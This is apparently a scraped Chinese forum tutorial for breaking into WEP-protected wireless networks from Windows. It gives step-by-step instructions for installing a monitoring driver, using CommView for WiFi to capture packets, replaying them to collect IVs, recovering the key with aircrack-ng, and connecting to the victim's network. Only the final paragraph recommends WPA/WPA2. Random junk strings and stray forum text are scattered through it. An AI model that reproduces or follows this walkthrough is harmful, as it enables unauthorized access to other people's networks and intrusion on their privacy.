【-w】:设置为字典研究学习模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到 WPA 验证的抓包文件。
相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单。部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技术飞速发展的时代已经不再保险,网上也有很多介绍实现无线WEP入侵的方法。今天笔者就再介绍一个更为精简的方法,让我们可以在五分钟之内实现无线WEP网络的入侵,将WEP加密密钥轻松还原出明文。
  一,五分钟实现无线WEP入侵的特点:4 N5 w: U1 N# L5 h8 P$ `$ Z8 z
  众所周知WEP加密入侵需要用户通过监听等方法接收到足够数量的WEP验证数据包,然后通过分析软件使用暴力PJ的方法穷举法还原出WEP加密密钥的明文信息。五分钟实现无线WEP入侵也必须通过这种方法来完成,不过不同的是传统的WEP加密PJ方法都需要攻击者通过诸如BT3,BT4这样的专业入侵光盘来完成,通过无线扫描和PJ光盘启动进入到类Linux操作系统的GUI界面,然后通过内置的PJ工具进行扫描和还原密钥工作,一方面操作上受到局限,进入GUI界面无法灵活选择应用程序;另一方面需要下载容量巨大基本上要有几个G的PJ光盘镜像,同时还需要刻录成光盘启动。最关键的一点就是这种PJ并不支持断点续破,也就是说如果中途关闭电源或者停止PJ的话,之前所做的工作将前功尽弃。
  今天笔者介绍的这个五分钟实现无线WEP入侵的方法则有效的解决了上面传统方法的不足,首先我们并不需要下载容量巨大的数据光盘,其次所有工作都直接在Windows系统下完成,全部图形化界面,而且我们可以将PJ工作划分成收集数据以及PJ数据两个阶段,从而大大提高了PJ效率,实现了断点续破的功能。通过本文介绍的方法我们可以在很短时间之内实现WEP验证数据包的收集,之后再进行WEP暴力PJ还原即可。总体来说PJWEP加密的无线网络速度更块。二,变更无线网卡驱动实现数据监听:
1 g# x) [7 e1 D: [5 b+ C! p
  和以往针对无线WEP加密PJ一样的是,我们首先需要将自己的无线网卡驱动进行更新,因为默认情况下无线网卡虽然能够进行无线通讯,但是无法胜任监听工作。具体步骤如下。, {+ y' t/ j7 T# n
  第一步:笔者使用的笔记本是IBM T400,默认情况下他的无线网卡是atheros ar5006系列,我们要将其更改为适合监控的类别。首先在我的电脑任务管理器里找到网络适配器下的无线网卡,在其上点鼠标右键选择“更新驱动程序”。(如图1)% W) ?4 U3 u2 G& J' O/ L# o. x& c6 A
  第二步:接下来会打开硬件安装向导,我们选择“从列表或指定位置安装(高级)”,然后点“下一步”按钮继续。(如图2)
  第三步:接下来是选择驱动程序,我们使用附件中的“驱动程序”目录中的文件进行安装即可,通过“浏览”按钮找到对应的网卡驱动程序,然后继续点“下一步”按钮。(如图3)9 D$ Y( Y( {/ g
第四步:系统会自动扫描指定目录,然后通过里面的驱动文件更新网卡驱动程序。(如图4)第五步:更新完毕后我们的无线网卡就被更改为commview atheros ar5006x wireless network adapter,点“完成”按钮结束。(如图5)  第六步:再次查询该网卡会看到名称已经被顺利更新到commview atheros ar5006x wireless network adapter了。(如图6)
  至此我们就完成了驱动程序的更新,现在我们笔记本的无线网卡已经具备监听无线通讯数据包的功能了。下面我们就可以通过专业的监控软件完成无线数据包的监听了。三,安装COMMVIEW FOR WIFI并收集相关无线通讯数据包:
  要想顺利监控无线通讯数据包除了使用专门的PJ光盘BT3或BT4外,我们可以通过纯WINDOWS系统下的软件来完成,这也是本文介绍的快速PJWEP加密的主要工具之一。他就是大名鼎鼎的commview for wifi。8 g6 W* a2 i&&|: ]
  commview for wifi小档案0 W&&Y&&}( l( v+ v5 R' P
  软件版本: 6.1 build 607
  软件大小:9881KB
  软件类别:共享版
  软件语言:英文版
  适用平台:windows 9X/ME/NT/2000/XP/2003
  下载地址:# A% h9 H7 ~$ k9 w+ c8 [3 l3 g
  ! T& p&&H&&n+ G* A
  第一步:从网上下载commview for wifi 6.1 build 607,值得注意一点的是一定要选择for wifi版,否则将无法顺利监控无线通讯数据包。下载后解压缩运行主安装程序,然后一路点next按钮即可,直到完成全部安装。(如图7)& Y4 g' K! `& I6 q% d
  第二步:接下来我们启动commview for wifi软件,在主界面上点“箭头”(开始监控)按钮,然后会打开扫描界面,接下来我们点右边的start scanning按钮将针对当前环境下的无线网络进行扫描,扫描将从频道1开始继续到频道13,所以扫描到的无线网络SSID以及设备类别等信息都会直接显示在scanner扫描界面中。点对应的名称后我们还可以看到具体信息,包括信号强度,设备MAC地址,IP地址等信息。(如图8)6 m# e- }7 N6 K& q6 w1 R5 h
  小提示:% w, @2 D: Y: h4 ]: f% Y0 [' h
  由于实际使用过程中并不是每个频道无线网络都很多的,所以我们可以直接在options标签下设置具体扫描频道,例如只扫描频道3,6,7等。这样可以最大限度的提高扫描速度。设置完毕后确定即可。(如图9)
  第三步:实际上笔者还有一个好办法来具体确定哪个扫描频道无线网络最多,那就是通过专门的快速无线扫描工具来完成,笔者使用的是wirelessmon专业版,通过此工具我们可以在几秒之内就知道当前环境下都有哪些无线网络存在了,包括那些没有开启SSID广播的网络也都能够找到,同时知道他们使用的信号频段,从而确定哪个频段下无线网络最多,再返回commview for wifi的scanner扫描中进行相应设置即可。(如图10)$ z, F1 |% \&&H3 d7 R
  第四步:一般来说我们针对无线网络进行数据监控不应该同时监视多个不同的无线网络,否则无线通讯数据包会比较多,一方面不容易筛选,另一方面也大大减少了最终的PJ速度。因此我们可以通过commview for wifi里的rules标签将要监视的无线网络设备MAC地址添加到过滤信息里,同时指定监控流量方向是只流出还是只流入又或者是全部通讯。一般建议大家使用全部方向上的通讯both。添加完MAC地址后选中enable mac address rules后将只针对该MAC设备开启的无线网络进行数据监视和记录。(如图11)9 e$ Y0 b$ T&&m% @
  第五步:设置完过滤信息后在scacnner扫描界面下点capture捕获即可,之后我们将会看到commview for wifi扫描到的所有无线数据包信息,包括频段以及对应的无线网络SSID信息。(如图12)
  第六步:适当监控一段时间后我们点packets数据包标签,在这里将看到所有监控到的无线通讯数据包。这时为了更好的查看和过滤数据信息我们点下面一排最右边的按钮,即图中显示18742数据包的1字上头对应的那个按钮。(如图13)
  第七步:打开log viewer界面后我们可以按照protocol协议来排列数据包,在这里找到标记为蓝色的而且协议名称是encr.data的数据即可,这个是我们要分析的数据包,只有通过这种数据包才能够顺利的PJ还原出WEP加密密钥来。(如图14)
  第八步:选择该数据包后通过点鼠标右键选择send packet(s)-&selected来复制该数据包并发送。(如图15)
  第九步:然后会自动打开发送数据包窗口,在这里我们只需要修改times处的次数即可,一般需要收集几十万个数据包才能够轻松PJ,笔者一般选择80万个数据包然后再PJ。点“发送”按钮后开始依次发送之前复制的数据包,下面也能够看到已经发送的数据包数量。(如图16)
  第十步:收集到足够的数据包后我们返回到commview for wifi主界面中的LOGGING日志记录标签,在这里通过“SAVE AS”按钮将其保存到本地硬盘后缀名是NCF的文件。(如图17)
  第十一步:接下来直接双击保存的NCF文件会自动用LOG VIEWER日志浏览工具打开该文件,在这里我们可以看到抓取下来的所有数据包信息,点FILE下的export logs-&tcpdump format,将其转换为TCPDUMP格式,只有该格式才能被下文暴力PJ提到的工具所支持。(如图18)
  生成了新的TCPDUMP格式的文件后我们的数据包抓取和监控工作才算完成,接下来就是通过暴力PJ的方式来还原WEP密钥了。四,利用aircrackPJWEP密钥:
2 N. O' O+ I+ k% L4 R
  我们使用aircrack软件来PJ收集到的数据从而还原出WEP密钥,笔者使用的是aircrack-ng GUI软件。相关软件在附件中提供,感兴趣的读者可以自行下载。3 K2 d& d% c9 _, t/ t
  第一步:启动aircrack-ng GUI主程序,直接选择左边第一个标签。
  第二步:通过CHOOSE按钮选择之前保存的TCPDUMP格式的文件,后缀名是CAP。(如图19)! ^4 H) j) |7 ]1 c8 k
第三步:点右下角的LAUNCH按钮开始分析监控到的数据包,软件会根据监控到的数据信息罗列出所有相关无线网络参数,这里我们需要选择IVS最高的那个,这个才是我们要PJ的那个无线网络,例如图中的WEP(38119IVS)。(如图20)  第四步:输入足够数量IVS对应的网络ID后将自动进入到暴力PJ环节,这时我们就需要耐心等待了。如果IVS数量不够会出现FAILED的提示,这说明我们还需要增加监控到的数据包数量。(如图21)
  第五步:如果满足破PJ数量的话等待一段时间后就会出现KEY FOUND的提示,我们就可以顺利的PJ目的无线网络使用的WEP加密密钥了,从而实现了无线WEP入侵的目的。(如图22)
  第六步:之后我们通过扫描到的SSID信息以及WEP密钥就可以顺利的连接到目的无线网络中了。% {7 p& P- V3 V9 y
  五,总结:
  本文介绍了如何在Windows环境下不使用引导光盘而直接PJ还原无线网络WEP加密的密钥,本方法有两大特色,第一PJ的全过程都是在WINDOWS环境下直接完成的,我们可以一边上网冲浪一边监控数据包,也不再需要刻录PJ引导光盘了;第二PJ是通过收集到的数据包来完成的,所以我们可以把PJ和收集两个工作分开,从而让PJ操作更加灵活,可以分期分批的完成PJ工作;第三相比传统的被动监控无线通讯数据包中WEP验证内容来说,本方法采取的是主动出击的方法,通过复制WEP验证数据包并反复发送虚假数据包来获取反馈信息,从而在最短时间内收集到足够数量的WEP验证数据包,最终大大提高了PJ速度。对于我们这些普通用户来说仅仅使用WEP加密已经不再安全,我们只有通过其他加密方式例如WPA,WPA2才能够保证无线网络通讯的隐私,因此希望各位无线网络用户能够通过本文引起足够的重视,减少WEP加密方式的无线网络应用,毕竟对于入侵者来说WEP加密不过是一扇半开着的大门。& g5 M#

我要回帖

更多关于 chinanet怎么用 的文章

 

随机推荐